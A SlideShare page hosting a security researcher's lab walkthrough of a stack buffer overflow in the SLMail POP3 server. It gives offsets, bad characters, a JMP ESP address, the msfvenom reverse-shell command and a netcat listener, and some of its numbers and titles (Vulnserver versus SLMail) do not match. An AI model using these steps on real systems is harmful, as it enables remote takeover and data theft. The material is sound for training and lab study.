SlideShare a Scribd company logo

Slmail Buffer Overflow

E
Eric alleshouse

This is a walkthrough on exploiting a vulnerability within the password parameter allowing the memory buffer to be overrun and a shell gained as a result

1 of 18
Downloaded 37 times
Exploiting SLMail by Stack Based Buffer Overflow Eric Alleshouse -- Independent Security Researcher ralleshouse@gmail.com April 27 2017 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 1
Table of Contents How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow……………....……………….…………………...…....……...1 Introduction…………………………….……….………………...……………..3 Lab setup………………………….…….………………...………………3 Immunity configuration………………..…….……………...……………..….4 Simple buffer test…………………………….…………...…………………....6 Nmap scan………………………………………………...……………………..7 Crashing the program………………………………...…………………….….8 A unique string.……………………………………...…………………….…....9 Finding EIP memory location ………….…………………………………...10 Controlling EIP…..………………………….………………………….….…..11 The bytearray……………………………….…………………………..……...12 Truncation………………...……………………….………………………..….13 JMP ESP….……………………………....……..…..…………………….…....15 The final Exploit compiled ...…………………..………………………...….16 Shell received ……………………………………..………..………………....17 How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 2
**A special thanks goes out to Aryan Guenthner, Penetration Tester, who has guided and encouraged me to ‘Try Harder’ at succeeding with this project and to produce this report. ** Introduction SLMail is SMTP and POP3 email server software for Microsoft™ Windows NT and 2000.​ It was meant to be a framework for an email solution and was written without an emphasis on security integrated in it’s development. As a result, the boundaries are not checked resulting in a buffer overflow situation. This vulnerability is exploitable and allows me to gain a remote shell on the system and extract sensitive documents from the system. If these instructions are followed, then the same results will be reproduced. SLMail can be downloaded ​here​. Lab setup I’m using the VirtualBox hypervisor with a Kali 2016.2 and Windows 7 virtual machines. Installed on the Windows machine is the SLmail pop3 server and immunity debugger with the mona.py script inserted into the python commands folder within Immunity debugger. The firewall in Windows has been turned off to simulate a possible real world simulation of security misconfiguration. Perhaps the firewall was disabled for troubleshooting purposes and forgotten about, among other scenarios that represent a misconfiguration. This exercise shows a consequence of failing to audit a system resulting in an exploit of the system and exposure to sensitive files. If the instructions are followed in this document, the results will be reproduced. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 3
SLmail can be downloaded from http://download.cnet.com/SLmail/3000-18506_4-10002446.html Kali can be downloaded from ​http://www.kali.org Immunity debugger: ​https://www.immunityinc.com/products/debugger/index.html Virtualbox: ​https://www.virtualbox.org/wiki/Downloads Mona.py (which is inserted into the commands folder in Immunity): https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ The goal of the exercise is to redirect the EIP memory address to a JMP ESP address which will lead the execution flow into a shellcode which I injected into memory, allowing me to browse the remote system and extract sensitive data. As a side note, my host operating system is a MacBook Pro, and I have found a limitation for drag and drop between host and guest, so the workaround to this is to create a shared folder on the host that is accessible by the vm’s. Netcat will also work, to transfer files, but takes a little more time to set up because it is not a native program within Windows. Once the VM’s are set up, I made sure the VM’s are on the ‘host only’ network so they are kept from being exposed to the internet. The Vm’s should be on the same network and able to ping each other. It is a good idea to start up the SLmail service and try connecting to it with netcat to be sure it is accepting inbound connections. To do this, issue the command: nc 192.168.56.101 110 (Ip address is the ip of the Windows machine, and the port it connects to is 110). You will see the pop server ready to accept instructions if successful. Immunity debugger should be started up and attached to the SLmail process and running so that the memory locations and dumps can be observed. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 4
Click file - attach - SLmail Within Immunity debugger, set the working folder to c:logs by issuing the command: !mona config -set workingfolder c:logs All created logs and documents from Mona will be found there. First, I need to verify the crash of the application by using a poc.py script to fuzz the application. The exploit will send 3000 ‘A’s to the server and crash it, to verify that there is a vulnerability within SLmail. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 5
A snapshot of the the whole exploit is shown below. It is written in python and imports the socket module to make a connection to the remote Vulnserver. It will send 3000 ‘A’s along with ‘PASS’ and the ‘USER username’ which the server takes as input. The server ip in the script reflects the ip address of my windows machine where vulnserver resides and the port it uses is 110, which I found from a simple nmap scan of the ip address. Initial exploit How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 6
Nmap scan of the ip address After sending this exploit from Kali, the result shows that the program crashes and ESP contains many ‘A’s or ‘41’ in hex. This shows that the boundary hasn’t been checked as I can inject my own data into the program and cause it to crash. Each time the program is crashed, SLmail needs to be restarted, and it’s process re-attached to Immunity. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 7
Program crash with 3000 ‘A’s in memory In order to find the specific location of ESP, a unique string needs to be sent to the program and the offset address located from the debugger. Use the Immunity command !mona pc 3000 (to create a unique string of characters. There is also a tool within Kali in the directory which can be used located in: /usr/share/metasploit-framework/tools/exploit/pattern_create Copy the unique string into the exploit and send it to the vulnserver. ie.exploit = 'Aa0Aa1Aa2Aa....' instead of the ‘A’s The unique pattern string will be found in the c:logs working folder after using the mona command. Or from Kali How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 8
Note the exploit was changed from ‘A’s to the unique string created. Then it was sent to the vulnserver to crash again. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 9
Server crash and unique string shown in memory dump After the system crashes, I locate the position of EIP. To find this, issued the Immunity command !mona po 396f4338 (or use the Kali tool /usr/share/metasploit_framework/tools/exploit/pattern_offset -q 296f4338 to find it's location) The location was found at position 2606. This will become my offset in the exploit. eg. !mona po 396f4338 The unique pattern found in EIP is located at position 2606. EIP will be the next 4 bytes in memory, so the pattern offset now becomes 'A'*2006 + 'B'*4 (run the script again to verify control of the EIP by noting that 4 ‘B’s get written to the EIP register. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 10
EIP register has ‘42’ or ‘B’’s written to it The four ‘B’s at the end of the ‘A’s are found and this confirms control over the EIP register. Next, I need to examine which bytes will cause problems within SLmail such as truncation, and render my exploit code useless. I use Immunity !mona bytearray -b "x00" to create a list of all the possible hex characters without the 00 character, which is a null byte and will cause truncation. The file will be saved to c:logs. I copied the string into the exploit and set this in place of the offset to view any further truncation caused by other bad characters, and eliminate them one by one until a clean set of characters is able to be passed to the program without issue. Below is illustrated all possible hex characters minus the 00. The picture with truncation happening shows that the 0A character is causing problems afterward indicated by a bunch of 00’s, and therefore will be removed. After removal of each character, the exploit is re-run to view the output in memory. It is important to remove these bad characters so that the shellcode will be run successfully. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 11
Send the byte array from the exploit : offset = 'A'*2006 + ‘B’*4 + badchars (bytearray) to see if there is any truncation caused by characters from the array. Offset and badchars are sent to the Vulnserver to test for truncation. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 12
Truncation happening. Notice the truncation after 09. After bad characters x00x0ax0d are removed there is no more truncation. The hex string is successfully inserted to the memory buffer without problems. These bytes will be excluded when creating the shellcode with msfvenom later on in the exercise. . No more truncation Use Immunity !mona modules -o (to find the modules compatible with dlls within SLmail to use, and double click on one that doesn’t have ASLR or DEP enabled. These randomize memory addresses of the JMP ESP and are used for security purposes. I chose SLmail.exe. The -o option filters out the operating system modules to whittle the module list to relevant listings.) How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 13
Click on the ‘e’ at the top to list the modules available and locate the SLmail.exe module and double click on it to jump to the slmail dlls. Working within SLmail.exe indicated in the title of the window How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 14
Use Immunity !mona find -s 'xffxe4' -m .dll (to find the location of a JMP ESP location) The JMP ESP in my case is located at 5F4B41E3. Written in little endian format, it will become 'xe3x41x4bx5f' in the exploit. (I replace the 'B'’s with JMP ESP address). Since I control EIP, I can direct it to go to the JMP ESP address, slide down some no-operation instructions and fall into the malicious shellcode). I verify the address by searching that memory address in the debugger. To create a payload in Kali without the bad characters and insert this as a variable in the script, I type: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.103 LPORT=443 -f py -a x86 --platform windows -b 'x00x0ax0d' and insert the shellcode into my exploit. The exploit becomes exploit = offset + JMP ESP + nops + buff (offset is the memory just before EIP) (JMP ESP is the address location of EIP) (buf was the shellcode created in kali which contains my reverse tcp shell. In this case there is just a snip of the shell code) (nops are sent to create a little space and be sure that the shellcode gets run in the memory. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 15
This is the final exploit with the shellcode. . How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 16
Setup a netcat listener in Kali so the Windows machine has a place to connect to (nc -lvp 443). Send the exploit ./poc.py to Vulnserver A shell is gained on the compromised Windows machine by exploiting a vulnerability in the SLmail programming. There was no boundary check to the user input, so I was able to make the program crash and gain entry to the system from my shellcode. The next phase of the process would be Post exploitation where I can perform data exfiltration, move laterally through various machines on the network, pass the hash, and showing the impact of the exploit, but will not be explored in this walkthrough. Other useful information can be gained from from computers, routers, printers etc. How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 17
System information gathered How to Exploit Vulnserver: A Practical Approach to Stack Based Buffer Overflow 18
Ad

Recommended

The OWASP Zed Attack Proxy
The OWASP Zed Attack ProxyThe OWASP Zed Attack Proxy
The OWASP Zed Attack Proxy
Aditya Gupta
 
OWASP ZAP
OWASP ZAPOWASP ZAP
OWASP ZAP
Alper Başaran
 
x86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislikx86 Mimarisi ve Tersine Mühendislik
x86 Mimarisi ve Tersine Mühendislik
canyoupwn.me
 
Li̇nux-101
Li̇nux-101Li̇nux-101
Li̇nux-101
Begüm Erol
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploit
msoner
 
Recon for Bug Bounty by Agnibha Dutta.pdf
Recon for Bug Bounty by Agnibha Dutta.pdfRecon for Bug Bounty by Agnibha Dutta.pdf
Recon for Bug Bounty by Agnibha Dutta.pdf
null - The Open Security Community
 
Kesif ve Zafiyet Tarama
Kesif ve Zafiyet TaramaKesif ve Zafiyet Tarama
Kesif ve Zafiyet Tarama
Ferhat Ozgur Catak
 
Valgrind
ValgrindValgrind
Valgrind
aidanshribman
 
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
 
Linux Komut Satırı
Linux Komut Satırı Linux Komut Satırı
Linux Komut Satırı
Kemal Demirez
 
Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
EPICROUTERS
 
Kali linux
Kali linuxKali linux
Kali linux
BGA Cyber Security
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE
 
Bash production guide
Bash production guideBash production guide
Bash production guide
Adrien Mahieux
 
Temel ağ bilgisi
Temel ağ bilgisiTemel ağ bilgisi
Temel ağ bilgisi
Begüm Erol
 
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMISINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
Ertugrul Akbas
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat Ulugay
Fuat Ulugay, CISSP
 
Linux 101
Linux 101Linux 101
Linux 101
Mehmet Gürol Çay
 
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman OzarslanWAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
Süleyman Özarslan
 
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
洋史 東平
 
Valgrind tutorial
Valgrind tutorialValgrind tutorial
Valgrind tutorial
Satabdi Das
 
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim SunumuBTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
BackTrack Linux-101 Eğitimi
BackTrack Linux-101 EğitimiBackTrack Linux-101 Eğitimi
BackTrack Linux-101 Eğitimi
BGA Cyber Security
 
Developing High-Impact Malware with Minimal Effort.pptx
Developing High-Impact Malware with Minimal Effort.pptxDeveloping High-Impact Malware with Minimal Effort.pptx
Developing High-Impact Malware with Minimal Effort.pptx
Elvin Gentiles
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
BGA Cyber Security
 
Bug-hunter's Sorrow
Bug-hunter's SorrowBug-hunter's Sorrow
Bug-hunter's Sorrow
Masato Kinugawa
 
Vulnserver bufferoverflow
Vulnserver bufferoverflowVulnserver bufferoverflow
Vulnserver bufferoverflow
Eric alleshouse
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
Ad

More Related Content

What's hot (20)

Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
 
Linux Komut Satırı
Linux Komut Satırı Linux Komut Satırı
Linux Komut Satırı
Kemal Demirez
 
Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
EPICROUTERS
 
Kali linux
Kali linuxKali linux
Kali linux
BGA Cyber Security
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE
 
Bash production guide
Bash production guideBash production guide
Bash production guide
Adrien Mahieux
 
Temel ağ bilgisi
Temel ağ bilgisiTemel ağ bilgisi
Temel ağ bilgisi
Begüm Erol
 
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMISINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
Ertugrul Akbas
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat Ulugay
Fuat Ulugay, CISSP
 
Linux 101
Linux 101Linux 101
Linux 101
Mehmet Gürol Çay
 
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman OzarslanWAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
Süleyman Özarslan
 
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
洋史 東平
 
Valgrind tutorial
Valgrind tutorialValgrind tutorial
Valgrind tutorial
Satabdi Das
 
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim SunumuBTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
BackTrack Linux-101 Eğitimi
BackTrack Linux-101 EğitimiBackTrack Linux-101 Eğitimi
BackTrack Linux-101 Eğitimi
BGA Cyber Security
 
Developing High-Impact Malware with Minimal Effort.pptx
Developing High-Impact Malware with Minimal Effort.pptxDeveloping High-Impact Malware with Minimal Effort.pptx
Developing High-Impact Malware with Minimal Effort.pptx
Elvin Gentiles
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
BGA Cyber Security
 
Bug-hunter's Sorrow
Bug-hunter's SorrowBug-hunter's Sorrow
Bug-hunter's Sorrow
Masato Kinugawa
 
Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)Zararlı Yazılım Analizi (ÖZET)
Zararlı Yazılım Analizi (ÖZET)
Alper Başaran
 
Linux Komut Satırı
Linux Komut Satırı Linux Komut Satırı
Linux Komut Satırı
Kemal Demirez
 
Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
EPICROUTERS
 
Kali linux
Kali linuxKali linux
Kali linux
BGA Cyber Security
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE
 
Bash production guide
Bash production guideBash production guide
Bash production guide
Adrien Mahieux
 
Temel ağ bilgisi
Temel ağ bilgisiTemel ağ bilgisi
Temel ağ bilgisi
Begüm Erol
 
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMISINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
Ertugrul Akbas
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat Ulugay
Fuat Ulugay, CISSP
 
Linux 101
Linux 101Linux 101
Linux 101
Mehmet Gürol Çay
 
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman OzarslanWAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
Süleyman Özarslan
 
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
PowerShellでWebブラウザ(Selenium Webdriver)を動かした話
洋史 東平
 
Valgrind tutorial
Valgrind tutorialValgrind tutorial
Valgrind tutorial
Satabdi Das
 
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim SunumuBTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
BTRisk Bilgi Güvenliği ve BT Yönetişim Hizmetleri
 
BackTrack Linux-101 Eğitimi
BackTrack Linux-101 EğitimiBackTrack Linux-101 Eğitimi
BackTrack Linux-101 Eğitimi
BGA Cyber Security
 
Developing High-Impact Malware with Minimal Effort.pptx
Developing High-Impact Malware with Minimal Effort.pptxDeveloping High-Impact Malware with Minimal Effort.pptx
Developing High-Impact Malware with Minimal Effort.pptx
Elvin Gentiles
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
BGA Cyber Security
 
Bug-hunter's Sorrow
Bug-hunter's SorrowBug-hunter's Sorrow
Bug-hunter's Sorrow
Masato Kinugawa
 

Similar to Slmail Buffer Overflow (20)

Vulnserver bufferoverflow
Vulnserver bufferoverflowVulnserver bufferoverflow
Vulnserver bufferoverflow
Eric alleshouse
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Linux synchronization tools
Linux synchronization toolsLinux synchronization tools
Linux synchronization tools
mukul bhardwaj
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
Ferruh Mavituna
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source CodeA Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
PVS-Studio
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming
Max Kleiner
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
Francis Alexander
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises
rICh morrow
 
P3.docx
P3.docxP3.docx
P3.docx
IsaacMwangi25
 
Vulnserver bufferoverflow
Vulnserver bufferoverflowVulnserver bufferoverflow
Vulnserver bufferoverflow
Eric alleshouse
 
Valgrind debugger Tutorial
Valgrind debugger TutorialValgrind debugger Tutorial
Valgrind debugger Tutorial
Anurag Tomar
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
D4rk357 a
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Why Windows 8 drivers are buggy
Why Windows 8 drivers are buggyWhy Windows 8 drivers are buggy
Why Windows 8 drivers are buggy
Andrey Karpov
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Rodolpho Concurde
 
Linux synchronization tools
Linux synchronization toolsLinux synchronization tools
Linux synchronization tools
mukul bhardwaj
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
Ferruh Mavituna
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
Payampardaz
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source CodeA Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
PVS-Studio
 
maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming maXbox Starter 42 Multiprocessing Programming
maXbox Starter 42 Multiprocessing Programming
Max Kleiner
 
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)
Elvin Gentiles
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
Francis Alexander
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
phanleson
 
"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises"PHP from soup to nuts" -- lab exercises
"PHP from soup to nuts" -- lab exercises
rICh morrow
 
P3.docx
P3.docxP3.docx
P3.docx
IsaacMwangi25
 
Ad

Recently uploaded (20)

What Do Contribution Guidelines Say About Software Testing? (MSR 2025)
What Do Contribution Guidelines Say About Software Testing? (MSR 2025)What Do Contribution Guidelines Say About Software Testing? (MSR 2025)
What Do Contribution Guidelines Say About Software Testing? (MSR 2025)
Andre Hora
 
Adobe After Effects Crack FREE FRESH version 2025
